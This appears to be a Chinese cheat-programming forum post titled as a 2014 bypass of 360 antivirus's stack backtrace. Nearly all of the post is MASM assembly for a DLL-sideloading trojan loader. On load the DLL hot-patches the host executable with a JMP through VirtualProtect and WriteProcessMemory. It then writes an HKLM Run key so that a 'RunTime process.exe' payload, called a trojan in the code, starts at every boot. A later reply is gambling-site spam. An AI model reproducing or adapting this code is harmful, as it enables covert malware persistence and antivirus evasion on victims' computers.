易语言教程_易语言源码_易语言写挂_易语言论坛_看流星社区

 找回密码
 注册
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
零基础辅助入门教学 原创 高清 专业课程售后(每日解答)
赞助广告位 请点击这里联系站长 QQ20209081
赞助广告位 请点击这里联系站长 QQ20209081
赞助广告位 请点击这里联系站长 QQ20209081
查看: 450|回复: 1

2014过360栈回溯

[复制链接]
发表于 2017-6-3 11:11:09 | 显示全部楼层 |阅读模式

360为了XX黑加白出的栈回溯技术
当然现在还会杀DLL 不过 断链动态解密一下应该还是没有问题的
博客新开,先扔出来一点儿


.486p
.model flat,stdcall
option casemap:none
assume fs:nothing


include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include     Advapi32.inc
includelib   Advapi32.lib
.data
szKeyAutoRun    db   'Software\Microsoft\Windows\CurrentVersion\Run',0
szValueAutoRun db   'baidusdpptoet',0
jmpaddr dd 00
hookaddr dd 00
oldprotect dd 00
dllhandle dd 00
mumaexepatch byte "\RunTime process.exe",0
backbyte byte 5 dup (?);备份5个字节
.code
funcxx proc


ret


funcxx endp
funcx proc


ret


funcx endp
funcxxx proc


ret


funcxxx endp


funcxaxx proc


ret


funcxaxx endp


threadx proc x:dword
invoke FreeLibraryAndExitThread,offset dllhandle,0
mov eax,0
ret


threadx endp
func proc
    local  @hKey
local  @szFileName[MAX_PATH]:byte






invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun ,addr @hKey
;invoke GetModuleFileName,NULL,addr @szFileName,260
invoke GetCurrentDirectory,260,addr @szFileName
invoke lstrcat,addr @szFileName,addr  mumaexepatch
;inc   eax
;mov @szFileName,'x'
invoke lstrlen,addr @szFileName
invoke RegSetValueEx,@hKey,offset szValueAutoRun,NULL,REG_SZ, addr @szFileName,eax
invoke RegCloseKey,@hKey
ret


func endp
start proc x,y,z:dword
.if y==DLL_PROCESS_ATTACH

push x
pop dllhandle


jmp xyz
xyz:
jmp pushaddr
pushaddr:

invoke GetModuleHandle,NULL
    add eax,100Bh
   mov hookaddr,eax;这里已经指向指定代码了
   mov jmpaddr,eax

;解除保护区域是hookaddr+100
nop
nop
nop
nop
nop
nop
mov byte ptr [backbyte],0E9H
mov eax,offset func
mov ebx ,hookaddr
sub eax,ebx
sub eax,5
mov dword ptr [backbyte+1],eax



invoke VirtualProtect, jmpaddr,1000,PAGE_EXECUTE_READWRITE, offset oldprotect ;
;lea eax,jmpaddr
;lea esi, offset backbyte
;cld
;movsd
;movsb
invoke GetCurrentProcess
invoke WriteProcessMemory,eax, jmpaddr,offset backbyte,5,NULL
;invoke CreateThread,NULL,NULL,offset threadx,NULL,0,NULL
jmp jmpaddr


.endif

ret


start endp


funcxxxxx proc


ret


funcxxxxx endp


end start
发表于 2018-6-13 12:35:49 | 显示全部楼层
名爵国际 娱 乐 城 官方网址:900868.com 专注互联网彩票,主要专营:各种互联网彩票,真人视讯。天天返水,因为是国际大品牌,值得您收藏拥有与信赖!
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 感恩
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|看流星社区  |网站地图

GMT+8, 2018-8-21 10:47 易语言论坛 易语言导航

Powered by 看流星社区 X3.2

©2011-2016 最好的辅助编程技术论坛

快速回复 返回顶部 返回列表